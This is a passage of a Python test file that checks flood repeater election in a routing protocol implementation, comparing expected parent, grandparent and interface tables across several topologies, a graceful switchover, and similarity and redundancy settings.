"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf15 | 15 | intf1 | 2 | 1: 4-2 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf12 | 12 | intf1 | 3 | 1: 4-2 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf17 | 17 | intf1 | 3 | 1: 4-2 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf18 | 18 | intf1 | 4 | 1: 4-2 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf13 | 13 | intf1 | 1 | 2: 1-1 | False |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf14 | 14 | intf1 | 1 | 2: 1-1 | False |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n")
expected_grandparents = (
"+-------------+--------+-------------+-------------+\n"
"| Grandparent | Parent | Flood | Redundantly |\n"
"| System ID | Count | Repeater | Covered |\n"
"| | | Adjacencies | |\n"
"+-------------+--------+-------------+-------------+\n"
"| 21 | 3 | 2 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 22 | 3 | 2 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 23 | 2 | 2 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 24 | 4 | 4 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 25 | 1 | 1 | False |\n"
"+-------------+--------+-------------+-------------+\n"
"| 26 | 3 | 3 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 27 | 4 | 4 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 28 | 1 | 1 | False |\n"
"+-------------+--------+-------------+-------------+\n")
expected_intfs = (
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| Interface | Neighbor | Neighbor | Neighbor | Neighbor | Neighbor is | This Node is |\n"
"| Name | Interface | System ID | State | Direction | Flood Repeater | Flood Repeater |\n"
"| | Name | | | | for This Node | for Neighbor |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf11 | intf1 | 11 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf12 | intf1 | 12 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf13 | intf1 | 13 | THREE_WAY | North | False | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf14 | intf1 | 14 | THREE_WAY | North | False | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf15 | intf1 | 15 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf16 | intf1 | 16 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf17 | intf1 | 17 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf18 | intf1 | 18 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n")
check_flood_repeater_election(parents, expected_parents, expected_grandparents, expected_intfs)
def test_8x8_full_connectivity_no_redundant_coverage():
# 8 parents (11, ..., 18)
# 8 grandparents (21, ..., 28)
# Partial connectivity between parents and grandparents:
# None of the grandparents are fully covered
# Default shuffle similarity of 2
packet_common.add_missing_methods_to_thrift()
parents = {
# pylint:disable=bad-whitespace
11: [ 23 ],
12: [ 28],
13: [21 ],
14: [ 22 ],
15: [ 24 ],
16: [ 26 ],
17: [ 27 ],
18: [ 25 ]
}
expected_parents = (
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| Interface | Parent | Parent | Grandparent | Similarity | Flood |\n"
"| Name | System ID | Interface | Count | Group | Repeater |\n"
"| | | Name | | | |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf17 | 17 | intf1 | 1 | 1: 1-1 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf15 | 15 | intf1 | 1 | 1: 1-1 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf13 | 13 | intf1 | 1 | 1: 1-1 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf14 | 14 | intf1 | 1 | 1: 1-1 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf11 | 11 | intf1 | 1 | 1: 1-1 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf18 | 18 | intf1 | 1 | 1: 1-1 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf16 | 16 | intf1 | 1 | 1: 1-1 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf12 | 12 | intf1 | 1 | 1: 1-1 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n")
expected_grandparents = (
"+-------------+--------+-------------+-------------+\n"
"| Grandparent | Parent | Flood | Redundantly |\n"
"| System ID | Count | Repeater | Covered |\n"
"| | | Adjacencies | |\n"
"+-------------+--------+-------------+-------------+\n"
"| 21 | 1 | 1 | False |\n"
"+-------------+--------+-------------+-------------+\n"
"| 22 | 1 | 1 | False |\n"
"+-------------+--------+-------------+-------------+\n"
"| 23 | 1 | 1 | False |\n"
"+-------------+--------+-------------+-------------+\n"
"| 24 | 1 | 1 | False |\n"
"+-------------+--------+-------------+-------------+\n"
"| 25 | 1 | 1 | False |\n"
"+-------------+--------+-------------+-------------+\n"
"| 26 | 1 | 1 | False |\n"
"+-------------+--------+-------------+-------------+\n"
"| 27 | 1 | 1 | False |\n"
"+-------------+--------+-------------+-------------+\n"
"| 28 | 1 | 1 | False |\n"
"+-------------+--------+-------------+-------------+\n")
expected_intfs = (
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| Interface | Neighbor | Neighbor | Neighbor | Neighbor | Neighbor is | This Node is |\n"
"| Name | Interface | System ID | State | Direction | Flood Repeater | Flood Repeater |\n"
"| | Name | | | | for This Node | for Neighbor |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf11 | intf1 | 11 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf12 | intf1 | 12 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf13 | intf1 | 13 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf14 | intf1 | 14 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf15 | intf1 | 15 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf16 | intf1 | 16 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf17 | intf1 | 17 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf18 | intf1 | 18 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n")
check_flood_repeater_election(parents, expected_parents, expected_grandparents, expected_intfs)
def test_graceful_switchover():
#
# Initial topology (same as test_8x8_partial_connectivity_partial_redundant_coverage)
#
packet_common.add_missing_methods_to_thrift()
parents = {
# pylint:disable=bad-whitespace
11: [21, 23, 26, 28],
12: [ 22, 24, 27 ],
13: [21 ],
14: [ 22, ],
15: [ 24, 27 ],
16: [ 23, 26, 27 ],
17: [ 22, 24, 26 ],
18: [21, 24, 25, 27 ]
}
expected_parents = (
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| Interface | Parent | Parent | Grandparent | Similarity | Flood |\n"
"| Name | System ID | Interface | Count | Group | Repeater |\n"
"| | | Name | | | |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf11 | 11 | intf1 | 4 | 1: 4-2 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf16 | 16 | intf1 | 3 | 1: 4-2 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf15 | 15 | intf1 | 2 | 1: 4-2 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf12 | 12 | intf1 | 3 | 1: 4-2 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf17 | 17 | intf1 | 3 | 1: 4-2 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf18 | 18 | intf1 | 4 | 1: 4-2 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf13 | 13 | intf1 | 1 | 2: 1-1 | False |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf14 | 14 | intf1 | 1 | 2: 1-1 | False |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n")
expected_grandparents = (
"+-------------+--------+-------------+-------------+\n"
"| Grandparent | Parent | Flood | Redundantly |\n"
"| System ID | Count | Repeater | Covered |\n"
"| | | Adjacencies | |\n"
"+-------------+--------+-------------+-------------+\n"
"| 21 | 3 | 2 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 22 | 3 | 2 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 23 | 2 | 2 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 24 | 4 | 4 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 25 | 1 | 1 | False |\n"
"+-------------+--------+-------------+-------------+\n"
"| 26 | 3 | 3 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 27 | 4 | 4 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 28 | 1 | 1 | False |\n"
"+-------------+--------+-------------+-------------+\n")
expected_intfs = (
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| Interface | Neighbor | Neighbor | Neighbor | Neighbor | Neighbor is | This Node is |\n"
"| Name | Interface | System ID | State | Direction | Flood Repeater | Flood Repeater |\n"
"| | Name | | | | for This Node | for Neighbor |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf11 | intf1 | 11 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf12 | intf1 | 12 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf13 | intf1 | 13 | THREE_WAY | North | False | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf14 | intf1 | 14 | THREE_WAY | North | False | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf15 | intf1 | 15 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf16 | intf1 | 16 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf17 | intf1 | 17 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf18 | intf1 | 18 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n")
test_node = check_flood_repeater_election(parents, expected_parents, expected_grandparents,
expected_intfs)
#
# LIEs with you-are-flood-repeater field set to true are sent over interfaces 11 and 12. They
# should not be pending anymore, but the others still should be.
#
for intf_name in ["intf11", "intf15"]:
intf = test_node.interfaces_by_name[intf_name]
intf.floodred_mark_sent_you_are_fr()
expected_intfs = (
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| Interface | Neighbor | Neighbor | Neighbor | Neighbor | Neighbor is | This Node is |\n"
"| Name | Interface | System ID | State | Direction | Flood Repeater | Flood Repeater |\n"
"| | Name | | | | for This Node | for Neighbor |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf11 | intf1 | 11 | THREE_WAY | North | True | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf12 | intf1 | 12 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf13 | intf1 | 13 | THREE_WAY | North | False | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf14 | intf1 | 14 | THREE_WAY | North | False | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf15 | intf1 | 15 | THREE_WAY | North | True | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf16 | intf1 | 16 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf17 | intf1 | 17 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf18 | intf1 | 18 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n")
assert test_node.floodred_interfaces_table().to_string() == expected_intfs
#
# Run the flood repeater election algorithm again. Nothing should change.
#
test_node.floodred_elect_repeaters()
assert test_node.floodred_parents_table().to_string() == expected_parents
assert test_node.floodred_grandparents_table().to_string() == expected_grandparents
assert test_node.floodred_interfaces_table().to_string() == expected_intfs
#
# LIEs with you-are-flood-repeater field set to true are sent all remaining pending interfaces.
#
for intf_name in ["intf12", "intf16", "intf17", "intf18"]:
intf = test_node.interfaces_by_name[intf_name]
intf.floodred_mark_sent_you_are_fr()
expected_intfs = (
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| Interface | Neighbor | Neighbor | Neighbor | Neighbor | Neighbor is | This Node is |\n"
"| Name | Interface | System ID | State | Direction | Flood Repeater | Flood Repeater |\n"
"| | Name | | | | for This Node | for Neighbor |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf11 | intf1 | 11 | THREE_WAY | North | True | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf12 | intf1 | 12 | THREE_WAY | North | True | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf13 | intf1 | 13 | THREE_WAY | North | False | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf14 | intf1 | 14 | THREE_WAY | North | False | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf15 | intf1 | 15 | THREE_WAY | North | True | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf16 | intf1 | 16 | THREE_WAY | North | True | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf17 | intf1 | 17 | THREE_WAY | North | True | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf18 | intf1 | 18 | THREE_WAY | North | True | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n")
assert test_node.floodred_interfaces_table().to_string() == expected_intfs
#
# Run the flood repeater election algorithm again. Nothing should change.
#
test_node.floodred_elect_repeaters()
assert test_node.floodred_parents_table().to_string() == expected_parents
assert test_node.floodred_grandparents_table().to_string() == expected_grandparents
assert test_node.floodred_interfaces_table().to_string() == expected_intfs
#
# Create new links between parents and grandparents, and re-run flood repeater election
# pylint:disable=bad-whitespace
parents[11] = [21, 22, 23, 24, 26, 27, 28]
parents[13] = [21, 22, 23, 25, 26, 28]
parents[14] = [21, 22, 24, 25, 26, 28]
update_test_node(test_node, parents)
test_node.floodred_elect_repeaters()
expected_parents = (
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| Interface | Parent | Parent | Grandparent | Similarity | Flood |\n"
"| Name | System ID | Interface | Count | Group | Repeater |\n"
"| | | Name | | | |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf14 | 14 | intf1 | 6 | 1: 7-6 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf13 | 13 | intf1 | 6 | 1: 7-6 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf11 | 11 | intf1 | 7 | 1: 7-6 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf17 | 17 | intf1 | 3 | 2: 4-2 | False |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf12 | 12 | intf1 | 3 | 2: 4-2 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf18 | 18 | intf1 | 4 | 2: 4-2 | False |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf15 | 15 | intf1 | 2 | 2: 4-2 | False |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf16 | 16 | intf1 | 3 | 2: 4-2 | False |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n")
assert test_node.floodred_parents_table().to_string() == expected_parents
expected_grandparents = (
"+-------------+--------+-------------+-------------+\n"
"| Grandparent | Parent | Flood | Redundantly |\n"
"| System ID | Count | Repeater | Covered |\n"
"| | | Adjacencies | |\n"
"+-------------+--------+-------------+-------------+\n"
"| 21 | 4 | 3 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 22 | 5 | 4 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 23 | 3 | 2 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 24 | 6 | 3 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 25 | 3 | 2 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 26 | 5 | 3 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 27 | 5 | 2 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 28 | 3 | 3 | True |\n"
"+-------------+--------+-------------+-------------+\n")
assert test_node.floodred_grandparents_table().to_string() == expected_grandparents
expected_intfs = (
"+-----------+-----------+-----------+-----------+-----------+-----------------+----------------+\n"
"| Interface | Neighbor | Neighbor | Neighbor | Neighbor | Neighbor is | This Node is |\n"
"| Name | Interface | System ID | State | Direction | Flood Repeater | Flood Repeater |\n"
"| | Name | | | | for This Node | for Neighbor |\n"
"+-----------+-----------+-----------+-----------+-----------+-----------------+----------------+\n"
"| intf11 | intf1 | 11 | THREE_WAY | North | True | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+-----------------+----------------+\n"
"| intf12 | intf1 | 12 | THREE_WAY | North | True | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+-----------------+----------------+\n"
"| intf13 | intf1 | 13 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+-----------------+----------------+\n"
"| intf14 | intf1 | 14 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+-----------------+----------------+\n"
"| intf15 | intf1 | 15 | THREE_WAY | North | False (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+-----------------+----------------+\n"
"| intf16 | intf1 | 16 | THREE_WAY | North | False (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+-----------------+----------------+\n"
"| intf17 | intf1 | 17 | THREE_WAY | North | False (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+-----------------+----------------+\n"
"| intf18 | intf1 | 18 | THREE_WAY | North | False (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+-----------------+----------------+\n")
assert test_node.floodred_interfaces_table().to_string() == expected_intfs
#
# Two of the parents (13 and 14) have just been elected to become new flood repeaters, but they
# are pending because we have not yet sent a LIE to them. Four of the parents (15, 16, 17, and
# 17) are no long flood repeaters, but they are waiting for the new flood repeaters to be
# informed before they step down.
#
# Send a LIE to parent 14. The old flood repeaters will still not yet step down, since 13 still
# needs to be informed.
#
intf = test_node.interfaces_by_name["intf14"]
intf.floodred_mark_sent_you_are_fr()
expected_intfs = (
"+-----------+-----------+-----------+-----------+-----------+-----------------+----------------+\n"
"| Interface | Neighbor | Neighbor | Neighbor | Neighbor | Neighbor is | This Node is |\n"
"| Name | Interface | System ID | State | Direction | Flood Repeater | Flood Repeater |\n"
"| | Name | | | | for This Node | for Neighbor |\n"
"+-----------+-----------+-----------+-----------+-----------+-----------------+----------------+\n"
"| intf11 | intf1 | 11 | THREE_WAY | North | True | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+-----------------+----------------+\n"
"| intf12 | intf1 | 12 | THREE_WAY | North | True | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+-----------------+----------------+\n"
"| intf13 | intf1 | 13 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+-----------------+----------------+\n"
"| intf14 | intf1 | 14 | THREE_WAY | North | True | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+-----------------+----------------+\n"
"| intf15 | intf1 | 15 | THREE_WAY | North | False (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+-----------------+----------------+\n"
"| intf16 | intf1 | 16 | THREE_WAY | North | False (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+-----------------+----------------+\n"
"| intf17 | intf1 | 17 | THREE_WAY | North | False (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+-----------------+----------------+\n"
"| intf18 | intf1 | 18 | THREE_WAY | North | False (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+-----------------+----------------+\n")
assert test_node.floodred_interfaces_table().to_string() == expected_intfs
#
# Send a LIE to parent 13. The old flood repeaters will finally step down since all new flood
# repeaters have been informed.
#
intf = test_node.interfaces_by_name["intf13"]
intf.floodred_mark_sent_you_are_fr()
expected_intfs = (
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| Interface | Neighbor | Neighbor | Neighbor | Neighbor | Neighbor is | This Node is |\n"
"| Name | Interface | System ID | State | Direction | Flood Repeater | Flood Repeater |\n"
"| | Name | | | | for This Node | for Neighbor |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf11 | intf1 | 11 | THREE_WAY | North | True | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf12 | intf1 | 12 | THREE_WAY | North | True | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf13 | intf1 | 13 | THREE_WAY | North | True | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf14 | intf1 | 14 | THREE_WAY | North | True | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf15 | intf1 | 15 | THREE_WAY | North | False | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf16 | intf1 | 16 | THREE_WAY | North | False | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf17 | intf1 | 17 | THREE_WAY | North | False | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf18 | intf1 | 18 | THREE_WAY | North | False | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n")
assert test_node.floodred_interfaces_table().to_string() == expected_intfs
def test_similarity():
packet_common.add_missing_methods_to_thrift()
#
# Default similarity is 2
#
parents = {}
test_node = make_test_node(parents)
expected_node_re = r"Flooding Reduction Similarity[| ]*2 "
assert re.search(expected_node_re, test_node.cli_details_table().to_string())
#
# Configure similarity 1
#
additional_node_config = {"flooding_reduction_similarity": 1}
test_node = make_test_node(parents, additional_node_config)
expected_node_re = r"Flooding Reduction Similarity[| ]*1 "
assert re.search(expected_node_re, test_node.cli_details_table().to_string())
#
# Topology (same as test_8x8_partial_connectivity_fully_redundant_coverage)
#
parents = {
# pylint:disable=bad-whitespace
11: [21, 22, 24, 25, 26 ],
12: [ 24, 25, 26, 27, 28],
13: [21, 22, 24, 26, 27, 28],
14: [21, 22, 23, 24, 25, 26, 27, 28],
15: [ 22, 24, 26, 28],
16: [21, 28],
17: [21, 22, 23, 25, 26, 27, 28],
18: [21, 22, 23, 24, 25, 27, 28]
}
expected_parents = (
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| Interface | Parent | Parent | Grandparent | Similarity | Flood |\n"
"| Name | System ID | Interface | Count | Group | Repeater |\n"
"| | | Name | | | |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf18 | 18 | intf1 | 7 | 1: 8-7 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf17 | 17 | intf1 | 7 | 1: 8-7 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf14 | 14 | intf1 | 8 | 1: 8-7 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf12 | 12 | intf1 | 5 | 2: 6-5 | False |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf11 | 11 | intf1 | 5 | 2: 6-5 | False |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf13 | 13 | intf1 | 6 | 2: 6-5 | False |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf15 | 15 | intf1 | 4 | 3: 4-4 | False |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf16 | 16 | intf1 | 2 | 4: 2-2 | False |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n")
expected_grandparents = (
"+-------------+--------+-------------+-------------+\n"
"| Grandparent | Parent | Flood | Redundantly |\n"
"| System ID | Count | Repeater | Covered |\n"
"| | | Adjacencies | |\n"
"+-------------+--------+-------------+-------------+\n"
"| 21 | 6 | 3 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 22 | 6 | 3 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 23 | 3 | 3 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 24 | 6 | 2 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 25 | 5 | 3 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 26 | 6 | 2 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 27 | 5 | 3 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 28 | 7 | 3 | True |\n"
"+-------------+--------+-------------+-------------+\n")
expected_intfs = (
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| Interface | Neighbor | Neighbor | Neighbor | Neighbor | Neighbor is | This Node is |\n"
"| Name | Interface | System ID | State | Direction | Flood Repeater | Flood Repeater |\n"
"| | Name | | | | for This Node | for Neighbor |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf11 | intf1 | 11 | THREE_WAY | North | False | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf12 | intf1 | 12 | THREE_WAY | North | False | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf13 | intf1 | 13 | THREE_WAY | North | False | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf14 | intf1 | 14 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf15 | intf1 | 15 | THREE_WAY | North | False | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf16 | intf1 | 16 | THREE_WAY | North | False | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf17 | intf1 | 17 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf18 | intf1 | 18 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n")
check_flood_repeater_election(parents, expected_parents, expected_grandparents, expected_intfs,
additional_node_config)
def test_redundancy():
packet_common.add_missing_methods_to_thrift()
#
# Default redundancy is 2
#
parents = {}
test_node = make_test_node(parents)
expected_node_re = r"Flooding Reduction Redundancy[| ]*2 "
assert re.search(expected_node_re, test_node.cli_details_table().to_string())
#
# Configure redundancy 1
#
additional_node_config = {"flooding_reduction_redundancy": 1}
test_node = make_test_node(parents, additional_node_config)
expected_node_re = r"Flooding Reduction Redundancy[| ]*1 "
assert re.search(expected_node_re, test_node.cli_details_table().to_string())
#
# Topology (same as test_8x8_partial_connectivity_fully_redundant_coverage)
#
parents = {
# pylint:disable=bad-whitespace
11: [21, 22, 24, 25, 26 ],
12: [ 24, 25, 26, 27, 28],
13: [21, 22, 24, 26, 27, 28],
14: [21, 22, 23, 24, 25, 26, 27, 28],
15: [ 22, 24, 26, 28],
16: [21, 28],
17: [21, 22, 23, 25, 26, 27, 28],
18: [21, 22, 23, 24, 25, 27, 28]
